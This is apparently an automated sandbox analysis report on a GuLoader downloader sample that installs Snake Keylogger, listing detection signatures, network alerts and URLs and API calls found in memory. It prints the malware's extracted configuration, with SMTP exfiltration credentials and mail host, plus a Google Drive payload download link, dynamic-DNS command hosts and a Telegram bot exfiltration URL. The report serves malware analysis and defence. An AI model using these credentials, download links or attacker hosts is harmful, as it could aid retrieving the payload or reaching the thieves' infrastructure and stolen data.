Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe
Analysis ID:	1617368
MD5:	de14a721ceada1b17548a62bda2371d9
SHA1:	79109c2d9deb5defb4a32d1b3583d2a7cbb0616e
SHA256:	3d48749c9933892087a4776b6bc0f7c25d156cb4ef0b0ff2af28e6cdca1df8d6
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe (PID: 3672 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe" MD5: DE14A721CEADA1B17548A62BDA2371D9)

SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe (PID: 3040 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe" MD5: DE14A721CEADA1B17548A62BDA2371D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "winefood@kuattrode.hn", "Password": "qzN$t-TB#R", "Host": "mail.kuattrode.hn", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2372837540.0000000008F96000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe PID: 3672	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe PID: 3040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T20:38:20.580807+0100	2803305	3	Unknown Traffic	192.168.2.8	49938	104.21.48.1	443	TCP
2025-02-17T20:38:24.380941+0100	2803305	3	Unknown Traffic	192.168.2.8	49969	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T20:38:18.863570+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49925	193.122.6.168	80	TCP
2025-02-17T20:38:20.004154+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49925	193.122.6.168	80	TCP
2025-02-17T20:38:21.269773+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49944	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T20:38:13.808179+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49889	142.250.186.174	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T20:38:30.840692+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	50000	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 19:38:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2904586447.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000000.00000002.2370237955.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000000.00000000.1640301351.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2904586447.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20a
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000038090000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000038050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000038050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enad
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.000000003805A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2914231593.00000000075A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2915899449.0000000009180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2544937814.0000000007617000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2544937814.0000000007617000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/F
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2544937814.0000000007617000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2914231593.00000000075A8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG&export=download
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2914231593.00000000075A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG&export=download&
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2544937814.0000000007617000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=15vbcfHhA3-NY0lHKD2HKKIGiP2ciaNOG&export=downloadC
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F83000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000037F16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.0000000038EC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2937408333.000000003913E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000003.2509400467.0000000007637000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.0000000038090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe, 00000007.00000002.2935251824.000000003808B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.8:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.8:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50000 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405050

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004030D9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		7_2_004030D9

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_00406344	0_2_00406344
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_0040488F	0_2_0040488F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_00406344	7_2_00406344
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0040488F	7_2_0040488F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755C748	7_2_0755C748
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755C478	7_2_0755C478
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07555380	7_2_07555380
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755D288	7_2_0755D288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755C148	7_2_0755C148
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CFB8	7_2_0755CFB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07559DE0	7_2_07559DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CCE8	7_2_0755CCE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755FB17	7_2_0755FB17
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CA18	7_2_0755CA18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755E988	7_2_0755E988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_075569B0	7_2_075569B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755C738	7_2_0755C738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755C468	7_2_0755C468
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07555362	7_2_07555362
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755D278	7_2_0755D278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CFAA	7_2_0755CFAA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CCD8	7_2_0755CCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755CA08	7_2_0755CA08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07553AB1	7_2_07553AB1
